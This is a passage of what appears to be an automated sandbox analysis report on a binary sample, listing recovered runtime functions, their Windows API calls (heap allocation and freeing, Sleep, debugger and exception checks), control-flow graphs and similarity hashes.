                                          • Associated: 00000006.00000002.306774023.0000000000100000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000006.00000002.306791835.000000000010C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000006.00000002.306805963.0000000000112000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000006.00000002.306810762.0000000000114000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_100000_KN38AzDG.jbxd
                                          Similarity
                                          • API ID: _free
                                          • String ID:
                                          • API String ID: 269201875-0
                                          • Opcode ID: 389d60a7859338c8f59c9ee6415f2d50312ecccd14a85a2b60df1aac21876f8c
                                          • Instruction ID: 9df7bd42aa211e70efc8e88579b4202b5e67366714e42e855a25418985c1e356
                                          • Opcode Fuzzy Hash: 389d60a7859338c8f59c9ee6415f2d50312ecccd14a85a2b60df1aac21876f8c
                                          • Instruction Fuzzy Hash: 6821AD726082405BEF289F6898827B97B6DCF82314F240159F9D59B2C6EBE39F038250
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          APIs
                                          • GetEnvironmentStringsW.KERNEL32 ref: 00105A2C
                                          • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00105A9A
                                            • Part of subcall function 00105935: WideCharToMultiByte.KERNEL32(?,00000000,00000000,?,00000001,001071BC,00108F94,0000FDE9,00000000,?,?,?,00108D0D,0000FDE9,00000000,?), ref: 001059E1
                                            • Part of subcall function 001062BC: RtlAllocateHeap.NTDLL(00000000,00013385,00013385,?,001053EB,00000220,00108668,00013385,?,?,?,?,00000000,00000000,?,00108668), ref: 001062EE
                                          • _free.LIBCMT ref: 00105A8B
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.306781386.0000000000101000.00000020.00000001.01000000.00000009.sdmp, Offset: 00100000, based on PE: true
                                          • Associated: 00000006.00000002.306774023.0000000000100000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000006.00000002.306791835.000000000010C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000006.00000002.306805963.0000000000112000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000006.00000002.306810762.0000000000114000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_100000_KN38AzDG.jbxd
                                          Similarity
                                          • API ID: EnvironmentStrings$AllocateByteCharFreeHeapMultiWide_free
                                          • String ID:
                                          • API String ID: 2560199156-0
                                          • Opcode ID: 23184b9b9a5499b4296af3ca1990952a8fb816179438bcb13eb10e98f8b1810a
                                          • Instruction ID: adc60b593c27c85850594da939d84f6fc314567dc85fdc684dcc17b79e3036c6
                                          • Opcode Fuzzy Hash: 23184b9b9a5499b4296af3ca1990952a8fb816179438bcb13eb10e98f8b1810a
                                          • Instruction Fuzzy Hash: 2001D8B2701A11FFE72116A65CC9C7B6A6ECEC6BA43150229B944D31C1EFD08D0189B0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          APIs
                                            • Part of subcall function 00105A23: GetEnvironmentStringsW.KERNEL32 ref: 00105A2C
                                            • Part of subcall function 00105A23: _free.LIBCMT ref: 00105A8B
                                            • Part of subcall function 00105A23: FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00105A9A
                                          • _free.LIBCMT ref: 00102FDF
                                          • _free.LIBCMT ref: 00102FE6
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.306781386.0000000000101000.00000020.00000001.01000000.00000009.sdmp, Offset: 00100000, based on PE: true
                                          • Associated: 00000006.00000002.306774023.0000000000100000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000006.00000002.306791835.000000000010C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000006.00000002.306805963.0000000000112000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000006.00000002.306810762.0000000000114000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_100000_KN38AzDG.jbxd
                                          Similarity
                                          • API ID: _free$EnvironmentStrings$Free
                                          • String ID:
                                          • API String ID: 2490078468-0
                                          • Opcode ID: 8cf34415599fe6bb232796841d8778abddcab672b7226e276892b67cc7022974
                                          • Instruction ID: 38467319cb39185bc00abfb3892ba91641856677647974aff55c61bba31fa5f3
                                          • Opcode Fuzzy Hash: 8cf34415599fe6bb232796841d8778abddcab672b7226e276892b67cc7022974
                                          • Instruction Fuzzy Hash: 99E02273A0482246DB253729FC06A6B13224F927B1B120316F8A49B0C2EFF0084205A2
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 86 1045de-1045e9 87 1045f7-1045fd 86->87 88 1045eb-1045f5 86->88 90 104616-104627 RtlAllocateHeap 87->90 91 1045ff-104600 87->91 88->87 89 10462b-104636 call 1045cb 88->89 95 104638-10463a 89->95 92 104602-104609 call 103664 90->92 93 104629 90->93 91->90 92->89 99 10460b-104614 call 106d27 92->99 93->95 99->89 99->90
                                          APIs
                                          • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,001042B2,00000001,00000364,00000006,000000FF,?,001045D0,00107A92,?,001072C9,?,00000000), ref: 0010461F
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.306781386.0000000000101000.00000020.00000001.01000000.00000009.sdmp, Offset: 00100000, based on PE: true
                                          • Associated: 00000006.00000002.306774023.0000000000100000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000006.00000002.306791835.000000000010C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000006.00000002.306805963.0000000000112000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000006.00000002.306810762.0000000000114000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_100000_KN38AzDG.jbxd
                                          Similarity
                                          • API ID: AllocateHeap
                                          • String ID:
                                          • API String ID: 1279760036-0
                                          • Opcode ID: fc8b30e368dc469c2527ea0d3245b52b0d319aaa1d4ec16371c545a74ab08fa6
                                          • Instruction ID: 63dcf0ca2b977c3a4e3db72bbe005702efd63ef0ae94ee4c4f124b01b7b185db
                                          • Opcode Fuzzy Hash: fc8b30e368dc469c2527ea0d3245b52b0d319aaa1d4ec16371c545a74ab08fa6
                                          • Instruction Fuzzy Hash: A3F0E97120052477DB216F269D85A6B3758DF92771F158111BAD4D71D0EBF1ED0186E0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 102 1062bc-1062c8 103 1062fa-106305 call 1045cb 102->103 104 1062ca-1062cc 102->104 111 106307-106309 103->111 106 1062e5-1062f6 RtlAllocateHeap 104->106 107 1062ce-1062cf 104->107 108 1062d1-1062d8 call 103664 106->108 109 1062f8 106->109 107->106 108->103 114 1062da-1062e3 call 106d27 108->114 109->111 114->103 114->106
                                          APIs
                                          • RtlAllocateHeap.NTDLL(00000000,00013385,00013385,?,001053EB,00000220,00108668,00013385,?,?,?,?,00000000,00000000,?,00108668), ref: 001062EE
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.306781386.0000000000101000.00000020.00000001.01000000.00000009.sdmp, Offset: 00100000, based on PE: true
                                          • Associated: 00000006.00000002.306774023.0000000000100000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000006.00000002.306791835.000000000010C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000006.00000002.306805963.0000000000112000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000006.00000002.306810762.0000000000114000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_100000_KN38AzDG.jbxd
                                          Similarity
                                          • API ID: AllocateHeap
                                          • String ID:
                                          • API String ID: 1279760036-0
                                          • Opcode ID: 12d49d0ebb405d7841363e413113ad543f10426ee6fcdd62e4ed8b0e43bf41ce
                                          • Instruction ID: 70158e75b3cbd56bb5c5a37d844b49595fbb4ea3fab6d81f9d8926b701ce9d44
                                          • Opcode Fuzzy Hash: 12d49d0ebb405d7841363e413113ad543f10426ee6fcdd62e4ed8b0e43bf41ce
                                          • Instruction Fuzzy Hash: 48E02231200221E7E62137669C00B9B3A4CAF657B0F110230FCDBE65D0CFE0DC2082E4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 117 101000-10100d Sleep
                                          APIs
                                          • Sleep.KERNELBASE(00002710), ref: 00101005
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.306781386.0000000000101000.00000020.00000001.01000000.00000009.sdmp, Offset: 00100000, based on PE: true
                                          • Associated: 00000006.00000002.306774023.0000000000100000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000006.00000002.306791835.000000000010C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000006.00000002.306805963.0000000000112000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000006.00000002.306810762.0000000000114000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_100000_KN38AzDG.jbxd
                                          Similarity
                                          • API ID: Sleep
                                          • String ID:
                                          • API String ID: 3472027048-0
                                          • Opcode ID: 14fdc2a83b2b2268acc20a38079b7d369ddd1f9acca81c20fbd41037dc74802c
                                          • Instruction ID: 2aef8a7f22cf7a58bb8276a80da45f130bea8ea8886611794e7ead74d1558169
                                          • Opcode Fuzzy Hash: 14fdc2a83b2b2268acc20a38079b7d369ddd1f9acca81c20fbd41037dc74802c
                                          • Instruction Fuzzy Hash: 47A0023525510486D60057745C0DB062594BF5870AF52CD21B586C84D9DBD040A0E961
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00101701
                                          • IsDebuggerPresent.KERNEL32 ref: 001017CD
                                          • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 001017ED
                                          • UnhandledExceptionFilter.KERNEL32(?), ref: 001017F7
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.306781386.0000000000101000.00000020.00000001.01000000.00000009.sdmp, Offset: 00100000, based on PE: true
                                          • Associated: 00000006.00000002.306774023.0000000000100000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000006.00000002.306791835.000000000010C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000006.00000002.306805963.0000000000112000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000006.00000002.306810762.0000000000114000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_100000_KN38AzDG.jbxd
                                          Similarity
                                          • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                          • String ID: Pdhv$`VhvPPhv
                                          • API String ID: 254469556-1390380883
                                          • Opcode ID: 62c33ba656e40a6706ee0b1d4177f39da84d411d2ec6f356b0646e8fb9ef746c
                                          • Instruction ID: bf3bdb879f40949c454a4827038b8469af599bc03aa30051ca1c474f1861d2b5
                                          • Opcode Fuzzy Hash: 62c33ba656e40a6706ee0b1d4177f39da84d411d2ec6f356b0646e8fb9ef746c
                                          • Instruction Fuzzy Hash: 67310775D01218EBDB11DFA4D989BCDBBB8AF08304F1041AAE449AB290EBB45B85DF45
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 0010445A
                                          • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 00104464
                                          • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 00104471
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.306781386.0000000000101000.00000020.00000001.01000000.00000009.sdmp, Offset: 00100000, based on PE: true
                                          • Associated: 00000006.00000002.306774023.0000000000100000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000006.00000002.306791835.000000000010C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000006.00000002.306805963.0000000000112000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000006.00000002.306810762.0000000000114000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_100000_KN38AzDG.jbxd
                                          Similarity
                                          • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                          • String ID: Pdhv$`VhvPPhv
                                          • API String ID: 3906539128-1390380883
                                          • Opcode ID: 789ce76b5115f8efb7bb43aa2572edffb6b9b6865e2bf390de7249bb6f899513
                                          • Instruction ID: ef5738dbf35fc21470cdb38cea722467ede7fb5b2c09f06c028c4bfd15d19240
                                          • Opcode Fuzzy Hash: 789ce76b5115f8efb7bb43aa2572edffb6b9b6865e2bf390de7249bb6f899513
                                          • Instruction Fuzzy Hash: CA31C47490122CABDB21DF64D98978DBBB8BF18350F6042EAF44CA6290E7749F85CF45
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 205 1064aa-1064be 206 1064c0-1064c5 205->206 207 10652c-106534 205->207 206->207 208 1064c7-1064cc 206->208 209 106536-106539 207->209 210 10657b-106593 call 10661b 207->210 208->207 211 1064ce-1064d1 208->211 209->210 213 10653b-106578 call 10463b * 4 209->213 219 106596-10659d 210->219 211->207 214 1064d3-1064db 211->214 213->210 217 1064f5-1064fd 214->217 218 1064dd-1064e0 214->218 224 106517-10652b call 10463b * 2 217->224 225 1064ff-106502 217->225 218->217 221 1064e2-1064f4 call 10463b call 106015 218->221 222 1065bc-1065c0 219->222 223 10659f-1065a3 219->223 221->217 229 1065c2-1065c7 222->229 230 1065d8-1065e4 222->230 233 1065a5-1065a8 223->233 234 1065b9 223->234 224->207 225->224 227 106504-106516 call 10463b call 106113 225->227 227->224 237 1065d5 229->237 238 1065c9-1065cc 229->238 230->219 240 1065e6-1065f1 call 10463b 230->240 233->234 242 1065aa-1065b8 call 10463b * 2 233->242 234->222 237->230 238->237 245 1065ce-1065d4 call 10463b 238->245 242->234 245->237
                                          APIs
                                          • ___free_lconv_mon.LIBCMT ref: 001064EE
                                            • Part of subcall function 00106015: _free.LIBCMT ref: 00106032
                                            • Part of subcall function 00106015: _free.LIBCMT ref: 00106044
                                            • Part of subcall function 00106015: _free.LIBCMT ref: 00106056
                                            • Part of subcall function 00106015: _free.LIBCMT ref: 00106068
                                            • Part of subcall function 00106015: _free.LIBCMT ref: 0010607A
                                            • Part of subcall function 00106015: _free.LIBCMT ref: 0010608C
                                            • Part of subcall function 00106015: _free.LIBCMT ref: 0010609E
                                            • Part of subcall function 00106015: _free.LIBCMT ref: 001060B0
                                            • Part of subcall function 00106015: _free.LIBCMT ref: 001060C2
                                            • Part of subcall function 00106015: _free.LIBCMT ref: 001060D4
                                            • Part of subcall function 00106015: _free.LIBCMT ref: 001060E6
                                            • Part of subcall function 00106015: _free.LIBCMT ref: 001060F8
                                            • Part of subcall function 00106015: _free.LIBCMT ref: 0010610A
                                          • _free.LIBCMT ref: 001064E3
                                            • Part of subcall function 0010463B: HeapFree.KERNEL32(00000000,00000000,?,001061A6,?,00000000,?,?,?,001061CD,?,00000007,?,?,00106641,?), ref: 00104651
                                            • Part of subcall function 0010463B: GetLastError.KERNEL32(?,?,001061A6,?,00000000,?,?,?,001061CD,?,00000007,?,?,00106641,?,?), ref: 00104663
                                          • _free.LIBCMT ref: 00106505
                                          • _free.LIBCMT ref: 0010651A
                                          • _free.LIBCMT ref: 00106525
                                          • _free.LIBCMT ref: 00106547
                                          • _free.LIBCMT ref: 0010655A
                                          • _free.LIBCMT ref: 00106568
                                          • _free.LIBCMT ref: 00106573
                                          • _free.LIBCMT ref: 001065AB
                                          • _free.LIBCMT ref: 001065B2
                                          • _free.LIBCMT ref: 001065CF
                                          • _free.LIBCMT ref: 001065E7
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.306781386.0000000000101000.00000020.00000001.01000000.00000009.sdmp, Offset: 00100000, based on PE: true
                                          • Associated: 00000006.00000002.306774023.0000000000100000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000006.00000002.306791835.000000000010C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000006.00000002.306805963.0000000000112000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000006.00000002.306810762.0000000000114000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_100000_KN38AzDG.jbxd
                                          Similarity
                                          • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                          • String ID:
                                          • API String ID: 161543041-0
                                          • Opcode ID: e4bfa634980082c71fe4a2c73f1bbe987b84f0e623f3e6dc6663e052f3e0aeae
                                          • Instruction ID: be0da02b4da4338f1a5cdfda28983e980465c0eda0ceaee6e572dbcc3bf71c12
                                          • Opcode Fuzzy Hash: e4bfa634980082c71fe4a2c73f1bbe987b84f0e623f3e6dc6663e052f3e0aeae
                                          • Instruction Fuzzy Hash: E2319EB16002019FEB20AA38DD85B5A77E8AF11750F108829F5D5D71D6EFB2FCA0CB14
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 262 103ff8-10400b 263 104017-1040c4 call 10463b * 9 call 103e24 call 103e8f 262->263 264 10400d-104016 call 10463b 262->264 264->263
                                          APIs
                                          • _free.LIBCMT ref: 0010400E
                                            • Part of subcall function 0010463B: HeapFree.KERNEL32(00000000,00000000,?,001061A6,?,00000000,?,?,?,001061CD,?,00000007,?,?,00106641,?), ref: 00104651
                                            • Part of subcall function 0010463B: GetLastError.KERNEL32(?,?,001061A6,?,00000000,?,?,?,001061CD,?,00000007,?,?,00106641,?,?), ref: 00104663
                                          • _free.LIBCMT ref: 0010401A
                                          • _free.LIBCMT ref: 00104025
                                          • _free.LIBCMT ref: 00104030
                                          • _free.LIBCMT ref: 0010403B
                                          • _free.LIBCMT ref: 00104046
                                          • _free.LIBCMT ref: 00104051
                                          • _free.LIBCMT ref: 0010405C
                                          • _free.LIBCMT ref: 00104067
                                          • _free.LIBCMT ref: 00104075
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.306781386.0000000000101000.00000020.00000001.01000000.00000009.sdmp, Offset: 00100000, based on PE: true
                                          • Associated: 00000006.00000002.306774023.0000000000100000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000006.00000002.306791835.000000000010C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000006.00000002.306805963.0000000000112000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000006.00000002.306810762.0000000000114000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_100000_KN38AzDG.jbxd
                                          Similarity
                                          • API ID: _free$ErrorFreeHeapLast
                                          • String ID:
                                          • API String ID: 776569668-0
                                          • Opcode ID: a0ae0d4d8aadedadd64ecf1695d054bdd534e958852a3b79874a3835e583027d
                                          • Instruction ID: 34884320cb3e2ea29a120d63b1aa297ebbd675fb9916a00adcc658dc359e8aa8
                                          • Opcode Fuzzy Hash: a0ae0d4d8aadedadd64ecf1695d054bdd534e958852a3b79874a3835e583027d
                                          • Instruction Fuzzy Hash: 8921BAB6900108AFCB01EF94C9C1DDE7BB8BF18744F408165F6559B1A2EB72EA45CF80
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 289 101bc0-101c11 call 10b610 call 101b80 call 102137 296 101c13-101c25 289->296 297 101c6d-101c70 289->297 298 101c90-101c99 296->298 300 101c27-101c3e 296->300 297->298 299 101c72-101c7f call 102120 297->299 305 101c84-101c8d call 101b80 299->305 302 101c40-101c4e call 1020c0 300->302 303 101c54 300->303 310 101c50 302->310 311 101c64-101c6b 302->311 304 101c57-101c5c 303->304 304->300 308 101c5e-101c60 304->308 305->298 308->298 312 101c62 308->312 314 101c52 310->314 315 101c9a-101ca3 310->315 311->305 312->305 314->304 316 101ca5-101cac 315->316 317 101cdd-101ced call 102100 315->317 316->317 318 101cae-101cbd call 10b4b0 316->318 323 101d01-101d1d call 101b80 call 1020e0 317->323 324 101cef-101cfe call 102120 317->324 326 101cda 318->326 327 101cbf-101cd7 318->327 324->323 326->317 327->326
                                          APIs
                                          • _ValidateLocalCookies.LIBCMT ref: 00101BF7
                                          • ___except_validate_context_record.LIBVCRUNTIME ref: 00101BFF
                                          • _ValidateLocalCookies.LIBCMT ref: 00101C88
                                          • __IsNonwritableInCurrentImage.LIBCMT ref: 00101CB3
                                          • _ValidateLocalCookies.LIBCMT ref: 00101D08
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.306781386.0000000000101000.00000020.00000001.01000000.00000009.sdmp, Offset: 00100000, based on PE: true
                                          • Associated: 00000006.00000002.306774023.0000000000100000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000006.00000002.306791835.000000000010C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000006.00000002.306805963.0000000000112000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000006.00000002.306810762.0000000000114000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_100000_KN38AzDG.jbxd
                                          Similarity
                                          • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                          • String ID: csm
                                          • API String ID: 1170836740-1018135373
                                          • Opcode ID: 91df656b67047768b271e84e171a02a4cb66d17757eeb41376d3383a206425ff
                                          • Instruction ID: 6196cf32ee22af1a6c870620095020ccf1b44fd42d352c558ad5c0970e4aa6a4
                                          • Opcode Fuzzy Hash: 91df656b67047768b271e84e171a02a4cb66d17757eeb41376d3383a206425ff
                                          • Instruction Fuzzy Hash: 2641E234A00208EBDF14DF68C884AAEBBB5EF45324F148155F8949B3D2D7B9EA55CB90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.306781386.0000000000101000.00000020.00000001.01000000.00000009.sdmp, Offset: 00100000, based on PE: true
                                          • Associated: 00000006.00000002.306774023.0000000000100000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000006.00000002.306791835.000000000010C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000006.00000002.306805963.0000000000112000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000006.00000002.306810762.0000000000114000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_100000_KN38AzDG.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: api-ms-$ext-ms-
                                          • API String ID: 0-537541572
                                          • Opcode ID: 339ea10298ff652c6b8c31d0a4e2627f37c92e3dd3c16ca9898517ea34582a65
                                          • Instruction ID: 1a66185cce6ee65a9a418f6f5ec28ec803c9f8cc270bd2262ae60399c4fe2de5
                                          • Opcode Fuzzy Hash: 339ea10298ff652c6b8c31d0a4e2627f37c92e3dd3c16ca9898517ea34582a65
                                          • Instruction Fuzzy Hash: FF21E771E01324EBDB255B649C85A1A3758AF11770F254222FDD5A72D4DBF0ED10C7E0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                            • Part of subcall function 0010617C: _free.LIBCMT ref: 001061A1
                                          • _free.LIBCMT ref: 00106202
                                            • Part of subcall function 0010463B: HeapFree.KERNEL32(00000000,00000000,?,001061A6,?,00000000,?,?,?,001061CD,?,00000007,?,?,00106641,?), ref: 00104651
                                            • Part of subcall function 0010463B: GetLastError.KERNEL32(?,?,001061A6,?,00000000,?,?,?,001061CD,?,00000007,?,?,00106641,?,?), ref: 00104663
                                          • _free.LIBCMT ref: 0010620D
                                          • _free.LIBCMT ref: 00106218
                                          • _free.LIBCMT ref: 0010626C
                                          • _free.LIBCMT ref: 00106277
                                          • _free.LIBCMT ref: 00106282
                                          • _free.LIBCMT ref: 0010628D
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.306781386.0000000000101000.00000020.00000001.01000000.00000009.sdmp, Offset: 00100000, based on PE: true
                                          • Associated: 00000006.00000002.306774023.0000000000100000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000006.00000002.306791835.000000000010C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000006.00000002.306805963.0000000000112000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000006.00000002.306810762.0000000000114000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_100000_KN38AzDG.jbxd
                                          Similarity
                                          • API ID: _free$ErrorFreeHeapLast
                                          • String ID:
                                          • API String ID: 776569668-0
                                          • Opcode ID: 133ea2b89444c130765e51dc6ef272bab715d3be83394f254edc6edf343bbe22
                                          • Instruction ID: 7bbf4f47b125503868bb0d6df2a21d489be532bb87d1ae36a647363ae94d1485
                                          • Opcode Fuzzy Hash: 133ea2b89444c130765e51dc6ef272bab715d3be83394f254edc6edf343bbe22
                                          • Instruction Fuzzy Hash: 0811EA71540B44ABD621B7B0CC46FCB77B86F6A700F404815B2D9660D3EBFAB51487D0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • GetConsoleOutputCP.KERNEL32(?,00000001,?), ref: 00108654
                                          • __fassign.LIBCMT ref: 00108839
                                          • __fassign.LIBCMT ref: 00108856
                                          • WriteFile.KERNEL32(?,001071BC,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0010889E
                                          • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 001088DE
                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 00108986
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.306781386.0000000000101000.00000020.00000001.01000000.00000009.sdmp, Offset: 00100000, based on PE: true
                                          • Associated: 00000006.00000002.306774023.0000000000100000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000006.00000002.306791835.000000000010C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000006.00000002.306805963.0000000000112000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000006.00000002.306810762.0000000000114000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_100000_KN38AzDG.jbxd
                                          Similarity
                                          • API ID: FileWrite__fassign$ConsoleErrorLastOutput
                                          • String ID:
                                          • API String ID: 1735259414-0
                                          • Opcode ID: fba86537a8b509765c408c44dec5bc6235848414ffd95f4bc4db3b0a4b5d0f38
                                          • Instruction ID: 7df91e6e73e1884d85151c8d38bcd82cb11b7e794de5493d5a7dfbde9a11dce6
                                          • Opcode Fuzzy Hash: fba86537a8b509765c408c44dec5bc6235848414ffd95f4bc4db3b0a4b5d0f38
                                          • Instruction Fuzzy Hash: C3C1AC75D04259DFCB15CFA8C8809EDFBB5AF58304F28816AE895FB281DB719942CF60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • GetLastError.KERNEL32(?,?,00102188,00101E5F,001018D9), ref: 0010219F
                                          • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 001021AD
                                          • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 001021C6
                                          • SetLastError.KERNEL32(00000000,00102188,00101E5F,001018D9), ref: 00102218
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.306781386.0000000000101000.00000020.00000001.01000000.00000009.sdmp, Offset: 00100000, based on PE: true
                                          • Associated: 00000006.00000002.306774023.0000000000100000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000006.00000002.306791835.000000000010C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000006.00000002.306805963.0000000000112000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000006.00000002.306810762.0000000000114000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_100000_KN38AzDG.jbxd
                                          Similarity
                                          • API ID: ErrorLastValue___vcrt_
                                          • String ID:
                                          • API String ID: 3852720340-0
                                          • Opcode ID: e085cf5b7614b0191456dd65706b60f3cbf1d4d932cf59053ee1b14cda313802
                                          • Instruction ID: 26927af2db6716fec1e4d85ac98e8dc0403d9a654263ea3e07bb3c52a5a6330c
                                          • Opcode Fuzzy Hash: e085cf5b7614b0191456dd65706b60f3cbf1d4d932cf59053ee1b14cda313802
                                          • Instruction Fuzzy Hash: D901D8326083116EE62937F4BC8DA666B56DB39374720432AF5A0944E1EFF14C909540
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
